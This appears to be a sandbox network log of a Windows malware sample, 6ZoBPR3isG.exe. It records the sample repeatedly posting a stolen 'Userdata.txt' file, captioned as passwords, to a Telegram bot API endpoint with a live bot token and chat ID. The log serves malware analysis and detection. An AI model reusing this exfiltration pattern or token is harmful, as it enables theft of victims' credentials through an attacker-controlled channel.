                                                                                                            2025-01-10 21:32:36 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43606,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544756,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            36192.168.2.350048149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:37 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3496e44435c9
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 39 36 65 34 34 34 33 35 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3496e44435c9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:38 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:38 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:38 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43607,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544758,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            37192.168.2.350050149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:39 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd34c5bacc94c0
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 63 35 62 61 63 63 39 34 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd34c5bacc94c0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:40 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:39 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:40 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43608,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544759,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            38192.168.2.350052149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:41 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd34f46a70432a
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 66 34 36 61 37 30 34 33 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd34f46a70432aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:41 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:41 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:41 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 36 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43609,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544761,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            39192.168.2.350054149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:43 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3537167c6af8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:43 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 33 37 31 36 37 63 36 61 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3537167c6af8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:43 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:43 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:43 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43610,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544763,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            40192.168.2.350056149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:44 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd357c0f145e3d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 37 63 30 66 31 34 35 65 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd357c0f145e3dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:45 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:45 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:45 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43611,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544765,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            41192.168.2.350058149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:46 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd35b812061467
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 62 38 31 32 30 36 31 34 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd35b812061467Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:46 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:46 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:46 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43612,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544766,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            42192.168.2.350060149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:48 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3602d21a3415
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 30 32 64 32 31 61 33 34 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3602d21a3415Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:48 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:48 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 543
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
